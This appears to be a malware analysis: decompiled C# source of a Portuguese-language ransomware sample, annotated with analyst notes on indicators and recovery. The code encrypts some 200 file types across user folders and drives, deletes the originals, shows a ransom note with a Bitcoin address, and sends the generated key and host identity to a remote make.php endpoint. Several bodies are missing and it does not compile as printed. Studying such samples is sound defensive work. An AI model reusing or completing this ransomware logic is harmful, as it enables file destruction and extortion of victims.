- Malware BR:
- https://www.virustotal.com/pt/file/576415db352356b31c487bf5fb29f406cf37bcd1ed6b00f2004e9cca5e9e5c40/analysis/
- Malware Reverse:
- using System;
- using System.ComponentModel;
- using System.Diagnostics;
- using System.Drawing;
- using System.IO;
- using System.Security.Cryptography;
- using System.Text;
- using System.Windows.Forms;
- namespace Instalador
- {
- public class frmInstalador : Form
- {
- private Button button1;
- private Button button2;
- private IContainer components;
- private ErrorProvider errorProvider1;
- private Label label1;
- private Label label2;
- private Label label3;
- private Label label4;
- private Label label5;
- private Label label6;
- private Label label7;
- private LinkLabel linkLabel1;
- private Panel panel1;
- private Panel panel2;
- private string pcn; // machine name, set in the constructor and sent in the key-report URL built in m()
- private PictureBox pictureBox1;
- private ProgressBar progressBar1;
- private ProgressBar progressBar2;
- private TextBox textBox1;
- private TextBox textBox2;
- private int totalFile; // count of files processed by e(); reported to the remote host at the end of m()
- private string us; // Windows user name, set in the constructor; used for the C:\Users\<name>\ path and the key-report URL in m()
// Constructor: records the current Windows user name and machine name, resets the processed-file
// counter, then builds the form. Both identifiers are later concatenated into the URL that m()
// requests, so they identify the victim host to the operator.
- public frmInstalador()
- {
- us = Environment.UserName;
- pcn = Environment.MachineName.ToString();
- totalFile = 0;
- components = null;
- InitializeComponent();
- }
// Click handler for button1, which InitializeComponent labels "Desbloquear meus arquivos"
// ("Unlock my files"). The body was not recovered: the "// trial" marker appears to be a placeholder
// left by the decompiler, so what this handler does with the password typed into textBox1 cannot be
// determined from this listing and has to be confirmed against the binary.
- private void button1_Click(object sender, EventArgs e)
- {
- // trial
- }
// Click handler for button2, which InitializeComponent labels "Copiar" ("Copy") and places next to
// the Bitcoin address label. The body was not recovered ("// trial" placeholder), so the copy
// behaviour is presumed from the label only.
- private void button2_Click(object sender, EventArgs e)
- {
- // trial
- }
// Per-file routine invoked by dd() for every file whose extension is ".qwerty". It is presumably the
// decryption counterpart of e(), but the body was not recovered ("// trial" placeholder), so the
// decryption parameters cannot be read from this listing.
- private void d(string inputFile, string _key)
- {
- // trial
- }
// Recursive walker for the restore path: for each file directly under `location` whose extension is
// exactly ".qwerty" it calls d(file, key), then calls itself on every subdirectory.
// Analyst notes:
//  - This is decompiler output and does not compile as printed: flag2 and flag3 are read before they
//    are assigned, which is how the tool rendered the original loops. Whether an empty directory is
//    handled safely therefore cannot be read from here.
//  - Every catch block is empty, so access-denied and I/O errors are silently ignored.
//  - No caller of dd() is visible in this listing; the handlers most likely to call it were not
//    recovered.
- public void dd(string location, string key)
- {
- bool flag2, flag3;
- try
- {
- string[] sArr1 = Directory.GetFiles(location);
- string[] sArr2 = Directory.GetDirectories(location);
- int i1 = 0;
- while (flag2)
- {
- Show();
- Refresh();
- Application.DoEvents();
- try
- {
- string s = Path.GetExtension(sArr1[i1]); // computed but not used in the visible code
- bool flag1 = Path.GetExtension(sArr1[i1]) == ".qwerty"; // only files carrying the ransomware's extension are handed to d()
- if (flag1)
- d(sArr1[i1], key);
- }
- catch
- {
- }
- i1++;
- flag2 = i1 < sArr1.Length;
- }
- int i2 = 0;
- while (flag3)
- {
- try
- {
- dd(sArr2[i2], key); // depth-first recursion into each subdirectory
- }
- catch
- {
- }
- i2++;
- flag3 = i2 < sArr2.Length;
- }
- }
- catch (Exception e)
- {
- }
- }
// Per-file encryption routine, called from ed(). For an existing file it writes an encrypted copy to
// "<inputFile>.qwerty", deletes the original and increments totalFile.
// What the visible code establishes (useful for triage and recovery work):
//  - Cipher: RijndaelManaged with no Mode/Padding/BlockSize set, so the .NET defaults for that class
//    apply.
//  - Key: the UTF-16LE bytes of _key hashed with SHA-256 repeatedly (the loop bound is 10), giving a
//    32-byte key. _key is the string generated by cp(2048) in m().
//  - IV: the UTF-16LE bytes of the string returned by the instance method gi(), whose body was not
//    recovered; the IV source is therefore unknown from this listing.
//  - The original is removed with File.Delete only; nothing in this method overwrites its contents
//    first, so deleted originals may still be recoverable from shadow copies, backups or by file
//    carving — confirm on the affected host.
//  - All exceptions are swallowed, so files that are locked or unreadable are skipped silently.
// Caveat: the listing is decompiler output and is not compilable (flag2, flag3 and i1 are read before
// assignment). The copy loop in particular is not a faithful rendering, so do not derive the
// on-disk ciphertext layout from it; verify against the binary referenced by the VirusTotal hash.
- private void e(string inputFile, string _key)
- {
- bool flag2, flag3;
- int i1;
- try
- {
- bool flag1 = !File.Exists(inputFile);
- if (flag1)
- return;
- string s1 = inputFile + ".qwerty"; // output name: original full name plus the ".qwerty" suffix
- UnicodeEncoding unicodeEncoding = new UnicodeEncoding();
- byte[] bArr1 = unicodeEncoding.GetBytes(_key);
- byte[] bArr2 = unicodeEncoding.GetBytes(gi()); // IV material; gi() body not recovered
- int i2 = 0;
- while (flag2)
- {
- bArr1 = SHA256.Create().ComputeHash(bArr1); // iterated SHA-256 over the key bytes
- i2++;
- flag2 = i2 < 10;
- }
- string s2 = s1;
- FileStream fileStream1 = new FileStream(s2, FileMode.Create);
- RijndaelManaged rijndaelManaged = new RijndaelManaged();
- CryptoStream cryptoStream = new CryptoStream(fileStream1, rijndaelManaged.CreateEncryptor(bArr1, bArr2), CryptoStreamMode.Write);
- FileStream fileStream2 = new FileStream(inputFile, FileMode.Open);
- while (flag3)
- {
- cryptoStream.WriteByte((byte)i1); // NOTE(review): as printed, i1 is written before it is first read — decompiler artifact
- i1 = fileStream2.ReadByte();
- flag3 = fileStream2.ReadByte() != -1; // NOTE(review): second ReadByte per iteration as printed; likely a rendering error, confirm in the binary
- }
- fileStream2.Close();
- cryptoStream.Close();
- fileStream1.Close();
- File.Delete(inputFile); // plain delete, no overwrite of the original's contents in this method
- totalFile++;
- }
- catch (Exception e)
- {
- }
- }
// Recursive walker for the encryption path: builds a 201-entry list of target extensions, calls
// e(file, key) for matching files directly under `location`, then calls itself on every subdirectory.
// Analyst notes:
//  - The extension list covers office documents, databases, source code, images and camera RAW
//    formats, archives, media, game assets, backups, certificate/key files (.pfx, .pem, .p12, ...)
//    and wallet files. It is a useful scoping reference when estimating impact on a host.
//  - Matching is `listEntry.IndexOf(fileExtension) >= 0`, i.e. a substring test of the file's
//    extension inside each list entry, not an equality test. As written, an extension that is a
//    substring of any entry also matches, and an empty extension matches every entry, so the set of
//    affected files is wider than the literal list. Treat the list as a lower bound.
//  - Files already ending in ".qwerty" are skipped.
//  - There is no exit from the inner loop after a match; repeated e() calls for the same path return
//    early because e() checks File.Exists after the first call has deleted the original.
//  - Every catch block is empty, so unreadable directories and files are skipped silently.
// Caveat: decompiler output, not compilable as printed. The `new string[201][n] = ...` lines are the
// tool's rendering of an array initializer that belongs to sArr1, and flag3/flag4/flag5 are read
// before assignment.
- public void ed(string location, string key)
- {
- bool flag3, flag4, flag5;
- try
- {
- new string[201][0] = ".cs"; // decompiler artifact: these assignments are the initializer of sArr1 below
- new string[201][1] = ".txt";
- new string[201][2] = ".doc";
- new string[201][3] = ".docx";
- new string[201][4] = ".xls";
- new string[201][5] = ".xlsx";
- new string[201][6] = ".ppt";
- new string[201][7] = ".pptx";
- new string[201][8] = ".odt";
- new string[201][9] = "jpeg"; // entry has no leading dot in the sample
- new string[201][10] = ".png";
- new string[201][11] = ".csv";
- new string[201][12] = ".sql";
- new string[201][13] = ".mdb";
- new string[201][14] = ".sln";
- new string[201][15] = ".php";
- new string[201][16] = ".asp";
- new string[201][17] = ".aspx";
- new string[201][18] = ".html";
- new string[201][19] = ".xml";
- new string[201][20] = ".psd";
- new string[201][21] = ".sql";
- new string[201][22] = ".mp4";
- new string[201][23] = ".mp3";
- new string[201][24] = ".7z";
- new string[201][25] = ".rar";
- new string[201][26] = ".m4a";
- new string[201][27] = ".wma";
- new string[201][28] = ".avi";
- new string[201][29] = ".wmv";
- new string[201][30] = ".csv";
- new string[201][31] = ".zip";
- new string[201][32] = ".sie";
- new string[201][33] = ".sum";
- new string[201][34] = ".ibank";
- new string[201][35] = ".t13";
- new string[201][36] = ".t12";
- new string[201][37] = ".qdf";
- new string[201][38] = ".gdb";
- new string[201][39] = ".tax";
- new string[201][40] = ".pkpass";
- new string[201][41] = ".bc6";
- new string[201][42] = ".bc7";
- new string[201][43] = ".bkp";
- new string[201][44] = ".qic";
- new string[201][45] = ".bkf";
- new string[201][46] = ".sidn";
- new string[201][47] = ".sidd";
- new string[201][48] = ".mddata";
- new string[201][49] = ".itl";
- new string[201][50] = ".itdb";
- new string[201][51] = ".icxs";
- new string[201][52] = ".hvpl";
- new string[201][53] = ".hplg";
- new string[201][54] = ".hkdb";
- new string[201][55] = ".mdbackup";
- new string[201][56] = ".syncdb";
- new string[201][57] = ".gho";
- new string[201][58] = ".cas";
- new string[201][59] = ".svg";
- new string[201][60] = ".map";
- new string[201][61] = ".wmo";
- new string[201][62] = ".itm";
- new string[201][63] = ".sb";
- new string[201][64] = ".fos";
- new string[201][65] = ".mov";
- new string[201][66] = ".vdf";
- new string[201][67] = ".ztmp";
- new string[201][68] = ".sis";
- new string[201][69] = ".sid";
- new string[201][70] = ".ncf";
- new string[201][71] = ".menu";
- new string[201][72] = ".layout";
- new string[201][73] = ".dmp";
- new string[201][74] = ".blob";
- new string[201][75] = ".esm";
- new string[201][76] = ".vcf";
- new string[201][77] = ".vtf";
- new string[201][78] = ".dazip";
- new string[201][79] = ".fpk";
- new string[201][80] = ".mlx";
- new string[201][81] = ".kf";
- new string[201][82] = ".iwd";
- new string[201][83] = ".vpk";
- new string[201][84] = ".tor";
- new string[201][85] = ".psk";
- new string[201][86] = ".rim";
- new string[201][87] = ".w3x";
- new string[201][88] = ".fsh";
- new string[201][89] = ".ntl";
- new string[201][90] = ".arch00";
- new string[201][91] = ".lvl";
- new string[201][92] = ".snx";
- new string[201][93] = ".cfr";
- new string[201][94] = ".ff";
- new string[201][95] = ".vpp_pc";
- new string[201][96] = ".lrf";
- new string[201][97] = ".m2";
- new string[201][98] = ".mcmeta";
- new string[201][99] = ".vfs0";
- new string[201][100] = ".mpqge";
- new string[201][101] = ".kdb";
- new string[201][102] = ".db0";
- new string[201][103] = ".dba";
- new string[201][104] = ".rofl";
- new string[201][105] = ".hkx";
- new string[201][106] = ".bar";
- new string[201][107] = ".upk";
- new string[201][108] = ".das";
- new string[201][109] = ".iwi";
- new string[201][110] = ".litemod";
- new string[201][111] = ".asset";
- new string[201][112] = ".forge";
- new string[201][113] = ".ltx";
- new string[201][114] = ".bsa";
- new string[201][115] = ".apk";
- new string[201][116] = ".re4";
- new string[201][117] = ".sav";
- new string[201][118] = ".lbf";
- new string[201][119] = ".slm";
- new string[201][120] = ".bik";
- new string[201][121] = ".epk";
- new string[201][122] = ".rgss3a";
- new string[201][123] = ".pak";
- new string[201][124] = ".big";
- new string[201][125] = "wallet"; // entry has no leading dot in the sample
- new string[201][126] = ".wotreplay";
- new string[201][127] = ".xxx";
- new string[201][128] = ".desc";
- new string[201][129] = ".py";
- new string[201][130] = ".m3u";
- new string[201][131] = ".flv";
- new string[201][132] = ".js";
- new string[201][133] = ".css";
- new string[201][134] = ".pk7";
- new string[201][135] = ".p7b";
- new string[201][136] = ".p12";
- new string[201][137] = ".pfx";
- new string[201][138] = ".pem";
- new string[201][139] = ".crt";
- new string[201][140] = ".cer";
- new string[201][141] = ".der";
- new string[201][142] = ".x3f";
- new string[201][143] = ".srw";
- new string[201][144] = ".pef";
- new string[201][145] = ".ptx";
- new string[201][146] = ".r3d";
- new string[201][147] = ".rw2";
- new string[201][148] = ".rwl";
- new string[201][149] = ".raw";
- new string[201][150] = ".raf";
- new string[201][151] = ".orf";
- new string[201][152] = ".nrw";
- new string[201][153] = ".mrwref";
- new string[201][154] = ".mef";
- new string[201][155] = ".erf";
- new string[201][156] = ".kdc";
- new string[201][157] = ".dcr";
- new string[201][158] = ".cr2";
- new string[201][159] = ".crw";
- new string[201][160] = ".bay";
- new string[201][161] = ".sr2";
- new string[201][162] = ".srf";
- new string[201][163] = ".arw";
- new string[201][164] = ".3fr";
- new string[201][165] = ".dng";
- new string[201][166] = ".jpe";
- new string[201][167] = ".jpg";
- new string[201][168] = ".cdr";
- new string[201][169] = ".indd";
- new string[201][170] = ".ai";
- new string[201][171] = ".eps";
- new string[201][172] = ".pdf";
- new string[201][173] = ".pdd";
- new string[201][174] = ".dbf";
- new string[201][175] = ".mdf";
- new string[201][176] = ".wb2";
- new string[201][177] = ".rtf";
- new string[201][178] = ".wpd";
- new string[201][179] = ".dxg";
- new string[201][180] = ".pst";
- new string[201][181] = ".accdb";
- new string[201][182] = ".mdb";
- new string[201][183] = ".pptm";
- new string[201][184] = ".pptx";
- new string[201][185] = ".ppt";
- new string[201][186] = ".xlk";
- new string[201][187] = ".xlsb";
- new string[201][188] = ".xlsm";
- new string[201][189] = ".xlsx";
- new string[201][190] = ".xls";
- new string[201][191] = ".wps";
- new string[201][192] = ".docm";
- new string[201][193] = ".docx";
- new string[201][194] = ".doc";
- new string[201][195] = ".odb";
- new string[201][196] = ".odc";
- new string[201][197] = ".odm";
- new string[201][198] = ".odp";
- new string[201][199] = ".ods";
- new string[201][200] = ".odt";
- string[] sArr1 = new string[201]; // the extension list; in the binary this array holds the 201 values above
- string[] sArr2 = Directory.GetFiles(location);
- string[] sArr3 = Directory.GetDirectories(location);
- int i1 = 0;
- while (flag4)
- {
- Show();
- Refresh();
- Application.DoEvents(); // keeps the "please wait" window repainting while files are processed on the UI thread
- try
- {
- string s = Path.GetExtension(sArr2[i1]);
- int i2 = 0;
- while (flag3)
- {
- bool flag1 = sArr1[i2].IndexOf(s) >= 0; // substring test: the list entry contains the file's extension
- if (flag1)
- {
- bool flag2 = Path.GetExtension(sArr2[i1]) != ".qwerty"; // never re-process files that already carry the marker extension
- if (flag2)
- e(sArr2[i1], key);
- }
- i2++;
- flag3 = i2 < sArr1.Length;
- }
- }
- catch
- {
- }
- i1++;
- flag4 = i1 < sArr2.Length;
- }
- int i3 = 0;
- while (flag5)
- {
- try
- {
- ed(sArr3[i3], key); // depth-first recursion into each subdirectory
- }
- catch
- {
- }
- i3++;
- flag5 = i3 < sArr3.Length;
- }
- }
- catch (Exception e)
- {
- }
- }
// Form Load handler (subscribed at the end of InitializeComponent). It forces the window to paint and
// then calls m(), so the whole key-report and encryption sequence starts as soon as the form loads,
// with no user interaction.
- private void frmInstalador_Load(object sender, EventArgs e)
- {
- Show();
- Refresh();
- Application.DoEvents();
- m();
- }
// Instance overload of gi(): returns the string that e() encodes as UTF-16LE and passes as the IV to
// CreateEncryptor. The body was not recovered ("// trial" placeholder); `return null` is filler from
// the decompiler, not the sample's behaviour. The IV value must be taken from the binary.
- private string gi()
- {
- // trial
- return null;
- }
// Designer-generated layout code for the single form. It defines two visual states:
//  - the initial "please wait" screen (label2, label3, progressBar1) shown while m() runs, and
//  - panel1, created hidden, which holds the ransom note (label5 headline, textBox2 body), the
//    Bitcoin address (label7), the Telegram contact link (label6/linkLabel1), the password box
//    (textBox1) and the unlock button (button1). panel2 inside it is a hidden "decrypting" status area.
// The user-visible strings are Portuguese. The strings and the Bitcoin address below are usable as
// static indicators for this sample; the ransom note body and the picture come from embedded
// resources that are not part of this listing.
- private void InitializeComponent()
- {
- components = new Container();
- ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(frmInstalador));
- panel1 = new Panel();
- pictureBox1 = new PictureBox();
- button2 = new Button();
- label7 = new Label();
- label6 = new Label();
- textBox2 = new TextBox();
- label5 = new Label();
- panel2 = new Panel();
- progressBar2 = new ProgressBar();
- label4 = new Label();
- button1 = new Button();
- textBox1 = new TextBox();
- label1 = new Label();
- label2 = new Label();
- progressBar1 = new ProgressBar();
- label3 = new Label();
- errorProvider1 = new ErrorProvider(components);
- linkLabel1 = new LinkLabel();
- panel1.SuspendLayout();
- pictureBox1.BeginInit();
- panel2.SuspendLayout();
- errorProvider1.BeginInit();
- SuspendLayout();
- panel1.Controls.Add(pictureBox1);
- panel1.Controls.Add(button2);
- panel1.Controls.Add(label7);
- panel1.Controls.Add(label6);
- panel1.Controls.Add(linkLabel1);
- panel1.Controls.Add(textBox2);
- panel1.Controls.Add(label5);
- panel1.Controls.Add(panel2);
- panel1.Controls.Add(button1);
- panel1.Controls.Add(textBox1);
- panel1.Controls.Add(label1);
- panel1.Location = new Point(0, 3);
- panel1.Name = "panel1";
- panel1.Size = new Size(628, 453);
- panel1.TabIndex = 0;
- panel1.Visible = false; // ransom panel starts hidden; m() makes it visible when it finishes
- pictureBox1.Image = (Image)componentResourceManager.GetObject("pictureBox1.Image");
- pictureBox1.Location = new Point(3, 226);
- pictureBox1.Name = "pictureBox1";
- pictureBox1.Size = new Size(245, 132);
- pictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
- pictureBox1.TabIndex = 10;
- pictureBox1.TabStop = false;
- button2.Location = new Point(566, 259);
- button2.Name = "button2";
- button2.Size = new Size(51, 21);
- button2.TabIndex = 9;
- button2.Text = "Copiar";
- button2.UseVisualStyleBackColor = true;
- button2.Click += new EventHandler(button2_Click);
- label7.AutoSize = true;
- label7.Font = new Font("Microsoft Sans Serif", 8.25F, FontStyle.Bold, GraphicsUnit.Point, 0);
- label7.Location = new Point(277, 245);
- label7.Name = "label7";
- label7.Size = new Size(344, 13);
- label7.TabIndex = 8;
- label7.Text = "Carteira Bitcoin: 15tGsTDLMztrxP1kCoKPBTaBgv1xCKRtkY"; // indicator: hard-coded payment address ("Bitcoin wallet: ...")
- label6.AutoSize = true;
- label6.Location = new Point(251, 339);
- label6.Name = "label6";
- label6.Size = new Size(54, 13);
- label6.TabIndex = 7;
- label6.Text = "Telegram:";
- textBox2.Location = new Point(3, 36);
- textBox2.Multiline = true;
- textBox2.Name = "textBox2";
- textBox2.Size = new Size(620, 188);
- textBox2.TabIndex = 5;
- textBox2.Text = componentResourceManager.GetString("textBox2.Text"); // ransom note body lives in the form's embedded resources, not in this listing
- label5.AutoSize = true;
- label5.Font = new Font("Microsoft Sans Serif", 16.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label5.ForeColor = Color.DarkRed;
- label5.Location = new Point(33, 8);
- label5.Name = "label5";
- label5.Size = new Size(562, 26);
- label5.TabIndex = 4;
- label5.Text = "ATEN\u00C7\u00C3O! Todos os seus arquivos foram sequestrados!"; // headline: "ATTENTION! All your files have been hijacked!"
- panel2.Controls.Add(progressBar2);
- panel2.Controls.Add(label4);
- panel2.Location = new Point(3, 358);
- panel2.Name = "panel2";
- panel2.Size = new Size(620, 94);
- panel2.TabIndex = 3;
- panel2.Visible = false;
- progressBar2.Location = new Point(218, 73);
- progressBar2.Name = "progressBar2";
- progressBar2.Size = new Size(388, 18);
- progressBar2.Style = ProgressBarStyle.Marquee;
- progressBar2.TabIndex = 1;
- label4.AutoSize = true;
- label4.Font = new Font("Microsoft Sans Serif", 12.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label4.Location = new Point(9, 11);
- label4.Name = "label4";
- label4.Size = new Size(409, 80);
- label4.TabIndex = 0;
- label4.Text = "Estamos agora tirando a criptografia dos seus arquivos...\r\nPor favor n\u00E3o feche esse programa!\r\nEsse processo pode demorar v\u00E1rios minutos!\r\nAvisaremos quando acabar!\r\n"; // status text for the restore phase: "We are now removing the encryption from your files..."
- button1.Location = new Point(475, 333);
- button1.Name = "button1";
- button1.Size = new Size(148, 23);
- button1.TabIndex = 2;
- button1.Text = "Desbloquear meus arquivos";
- button1.UseVisualStyleBackColor = true;
- button1.Click += new EventHandler(button1_Click);
- textBox1.Location = new Point(250, 292);
- textBox1.Multiline = true;
- textBox1.Name = "textBox1";
- textBox1.Size = new Size(367, 39);
- textBox1.TabIndex = 1;
- label1.AutoSize = true;
- label1.Font = new Font("Microsoft Sans Serif", 8.25F, FontStyle.Bold, GraphicsUnit.Point, 0);
- label1.Location = new Point(247, 276);
- label1.Name = "label1";
- label1.Size = new Size(112, 13);
- label1.TabIndex = 0;
- label1.Text = "Digite o password:";
- label2.AutoSize = true;
- label2.Font = new Font("Microsoft Sans Serif", 30.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label2.Location = new Point(131, 58);
- label2.Name = "label2";
- label2.Size = new Size(371, 46);
- label2.TabIndex = 1;
- label2.Text = "Por favor aguarde...";
- progressBar1.Location = new Point(25, 143);
- progressBar1.Name = "progressBar1";
- progressBar1.Size = new Size(598, 23);
- progressBar1.Style = ProgressBarStyle.Marquee;
- progressBar1.TabIndex = 2;
- label3.AutoSize = true;
- label3.Font = new Font("Microsoft Sans Serif", 20.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label3.Location = new Point(6, 104);
- label3.Name = "label3";
- label3.Size = new Size(626, 31);
- label3.TabIndex = 3;
- label3.Text = "Verificando comunica\u00E7\u00E3o com nossos servidores..."; // decoy status shown during encryption: "Checking communication with our servers..."
- errorProvider1.ContainerControl = this;
- linkLabel1.AutoSize = true;
- linkLabel1.Font = new Font("Microsoft Sans Serif", 12.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- linkLabel1.Location = new Point(322, 334);
- linkLabel1.Name = "linkLabel1";
- linkLabel1.Size = new Size(0, 20);
- linkLabel1.TabIndex = 6;
- AutoScaleDimensions = new SizeF(6.0F, 13.0F);
- AutoScaleMode = AutoScaleMode.Font;
- ClientSize = new Size(635, 461);
- Controls.Add(panel1);
- Controls.Add(label3);
- Controls.Add(progressBar1);
- Controls.Add(label2);
- Name = "frmInstalador";
- StartPosition = FormStartPosition.CenterScreen;
- Text = "Aguarde...";
- TopMost = true; // window is kept above other windows
- Load += new EventHandler(frmInstalador_Load); // Load triggers m(), i.e. the encryption run
- panel1.ResumeLayout(false);
- panel1.PerformLayout();
- pictureBox1.EndInit();
- panel2.ResumeLayout(false);
- panel2.PerformLayout();
- errorProvider1.EndInit();
- ResumeLayout(false);
- PerformLayout();
- }
// LinkClicked handler that opens the operator's hard-coded Telegram contact URL with the default
// handler via Process.Start. The handle in the URL is a static indicator for this sample.
// NOTE(review): no LinkClicked subscription for linkLabel1 appears in the InitializeComponent shown
// in this listing, so whether this handler is actually wired up needs confirming against the binary.
- private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
- {
- Process.Start("http://t.me/@rodolfoanubis");
- }
// Main routine, called from the form's Load handler. Sequence as shown in the listing:
//  1. Check for a file named "qwerty" on the current user's Desktop. If it already exists the whole
//     encryption branch is skipped and only the ransom panel is shown, so the file acts as a
//     run-once marker and is a host indicator of prior execution.
//  2. Otherwise create the marker, generate the key string with cp(2048), and pass a URL built from
//     the make.php endpoint, a "ddMMyy HHmmss" timestamp, the user name, the machine name and the
//     key itself to get().
//  3. Fetch t.txt from the same host and use the response as the text of the Telegram link label.
//  4. Run ed() over the user's profile directory, drive roots D: to K:, and several special folders.
//  5. Send a second request reporting the timestamp and the number of files processed.
//  6. Make panel1 (the ransom note) visible.
// Incident-response notes:
//  - The URLs are plain http:// and the key is placed in the query string, so if get() performs an
//    ordinary web request (its body was not recovered) the key may be present in proxy logs, packet
//    captures or web-filter logs from the time of infection. Check those before assuming the data
//    is unrecoverable.
//  - Network indicators on this page: the darkminer.scienceontheweb.net host and its make.php and
//    t.txt paths.
//  - The outer catch is empty, so a failure anywhere in the sequence (for example the first request)
//    aborts the rest silently; in that case panel1 is not shown by this method.
// Caveat: the `new string[8][n] = ...` and `new object[4][n] = ...` lines are the decompiler's
// rendering of the arrays passed to String.Concat; the listing is not compilable as printed.
- private void m()
- {
- try
- {
- bool flag = !File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\qwerty");
- if (flag)
- {
- File.Create(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\qwerty"); // run-once marker file on the Desktop
- Show();
- Refresh();
- Application.DoEvents();
- panel1.Visible = false;
- string s = frmInstalador.cp(2048); // per-run key string; passed to every ed() call below
- new string[8][0] = "http://darkminer.scienceontheweb.net/make.php?info=KEY ";
- DateTime dateTime = DateTime.Now;
- new string[8][1] = dateTime.ToString("ddMMyy HHmmss");
- new string[8][2] = " - ";
- new string[8][3] = us;
- new string[8][4] = " | ";
- new string[8][5] = pcn;
- new string[8][6] = " | ";
- new string[8][7] = s;
- frmInstalador.get(String.Concat(new string[8])); // key report: timestamp, user, machine and key in one URL
- linkLabel1.Text = frmInstalador.get("http://darkminer.scienceontheweb.net/t.txt"); // contact text is fetched from the remote host at run time
- ed("C:\\Users\\" + us + "\\", s); // hard-coded profile path built from the user name
- ed("D:\\", s);
- ed("E:\\", s);
- ed("F:\\", s);
- ed("G:\\", s);
- ed("H:\\", s);
- ed("I:\\", s);
- ed("J:\\", s);
- ed("K:\\", s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Desktop), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Personal), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.MyMusic), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Personal), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Recent), s);
- new object[4][0] = "http://darkminer.scienceontheweb.net/make.php?info=INFO ";
- dateTime = DateTime.Now;
- new object[4][1] = dateTime.ToString("ddMMyy HHmmss");
- new object[4][2] = " Total Files ";
- new object[4][3] = totalFile;
- frmInstalador.get(String.Concat(new object[4])); // completion report with the processed-file count
- }
- panel1.Visible = true; // show the ransom note, whether or not encryption ran in this session
- }
- catch
- {
- }
- }
// Form.Dispose override. The body was not recovered ("// trial" placeholder); in designer-generated
// forms this method normally just disposes `components`, but that is not shown here.
- protected override void Dispose(bool disposing)
- {
- // trial
- }
// Builds the random key string used for the run. Each character is picked from a 62-character
// alphanumeric alphabet at the index returned by the static gi(rng, alphabetLength), with an
// RNGCryptoServiceProvider as the randomness source. m() calls this with length 2048.
// Caveat: `flag` is read before assignment in this decompiler rendering, so the exact number of
// characters appended for a given `length` cannot be confirmed from the listing, and the static
// gi() body was not recovered. Nothing here shows the key being derived from host data; per m(), it
// is generated at run time and sent to the remote host.
- public static string cp(int length)
- {
- bool flag;
- StringBuilder stringBuilder = new StringBuilder();
- RNGCryptoServiceProvider rngcryptoServiceProvider = new RNGCryptoServiceProvider();
- while (flag)
- {
- stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"[frmInstalador.gi(rngcryptoServiceProvider, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890".Length)]);
- flag = length-- > 0;
- }
- return stringBuilder.ToString();
- }
// Network helper used by m() for both reports and for fetching t.txt; m() uses the return value as
// text. The body was not recovered ("// trial" placeholder) and `return null` is decompiler filler,
// so the request method, headers and user agent are unknown from this listing — presumably a simple
// HTTP download of the given URL; confirm in the binary or in a sandbox capture.
- public static string get(string url)
- {
- // trial
- return null;
- }
// Static overload of gi(): cp() uses its return value as an index into the key alphabet, passing the
// alphabet length as `max`. The body was not recovered ("// trial" placeholder) and `return 0` is
// decompiler filler, so how the index is derived from the RNG is not visible here.
- public static int gi(RNGCryptoServiceProvider rnd, int max)
- {
- // trial
- return 0;
- }
- } // class frmInstalador
- }